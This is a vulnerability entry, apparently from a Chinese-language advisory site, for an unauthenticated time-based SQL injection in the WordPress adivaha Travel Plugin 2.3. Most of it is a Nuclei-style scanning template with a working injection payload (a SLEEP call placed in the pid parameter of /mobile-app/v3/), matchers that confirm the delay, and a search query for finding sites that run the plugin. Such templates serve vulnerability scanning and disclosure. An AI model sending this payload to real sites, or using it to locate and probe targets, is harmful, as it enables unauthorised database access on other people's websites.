漏洞描述
An unauthenticated Time-Based SQL injection found in adivaha Travel Plugin 2.3 allows a remote attacker to retrieve the contents of an entire database.
wp-adivaha-sqli: WordPress adivaha Travel Plugin 2.3 - SQL Injection
PoC代码[已公开]
id: wp-adivaha-sqli
info:
name: WordPress adivaha Travel Plugin 2.3 - SQL Injection
author: theamanrawat
severity: high
description: |
An unauthenticated Time-Based SQL injection found in adivaha Travel Plugin 2.3 allows a remote attacker to retrieve the contents of an entire database.
reference:
- https://wordpress.org/plugins/adiaha-hotel/
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/adiaha-hotel/"
tags: time-based-sqli,sqli,adivaha,wordpress,wp,wp-plugin,vuln
http:
- raw:
- |
@timeout: 25s
GET /mobile-app/v3/?pid='+AND+(SELECT+6398+FROM+(SELECT(SLEEP(7)))zoQK)+AND+'Zbtn'='Zbtn&isMobile=chatbot HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- duration>=7
- status_code == 200
- contains(body, "adivaha")
condition: and
# digest: 490a00463044022033af6eff6c3382a8f63548cd3a9fb635959569f5d4dee21127ba6c51d59c58f102200eb1214d1bfa78bdf26b3ab227b52f663a54727cf5a8eefc432f9a5dc93f7cbd:922c64590222798bb761d5b6d8e72950